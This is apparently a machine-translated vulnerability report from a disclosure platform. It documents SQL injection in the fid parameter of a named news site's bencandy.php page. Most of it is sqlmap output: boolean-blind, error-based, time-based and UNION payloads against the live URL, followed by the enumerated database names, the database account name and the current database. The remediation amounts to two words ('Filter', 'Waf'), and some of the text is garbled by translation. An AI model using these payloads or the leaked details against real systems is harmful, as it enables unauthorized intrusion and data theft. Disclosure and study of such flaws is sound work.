The SQL injection vulnerability exists in a website of maopu.
Http://zone.wooyun.org/content/26213
Lady.mop.com/news/bencandy.php? Fid = 47 & aid = 908
Existing Injection Parameters
Find
Parameter: fid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: fid=47 AND 1872=1872&aid=908 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: fid=47 AND (SELECT 7959 FROM(SELECT COUNT(*),CONCAT(0x71766b6a71,(SELECT (ELT(7959=7959,1))),0x7162786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&aid=908 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: fid=47 AND (SELECT * FROM (SELECT(SLEEP(5)))anib)&aid=908 Type: UNION query Title: MySQL UNION query (NULL) - 52 columns Payload: fid=47 UNION ALL SELECT NULL,CONCAT(0x71766b6a71,0x557a59596d4d7661656e,0x7162786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&aid=908---[14:38:10] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0
Library
available databases [14]:[*] information_schema[*] mop_demo[*] mop_entertainment[*] mop_entertainment1[*] mop_health[*] mop_health1[*] mop_lady[*] mop_lady1[*] mop_local[*] mop_news[*] mop_society[*] mop_society1[*] mysql[*] performance_schema
User Information
back-end DBMS: MySQL 5.0[14:36:46] [INFO] fetching current usercurrent user: 'liudutianxia@%'[14:36:47] [INFO] fetching current databasecurrent database: 'mop_lady1'
Poor image uploading
Solution:
Filter
Waf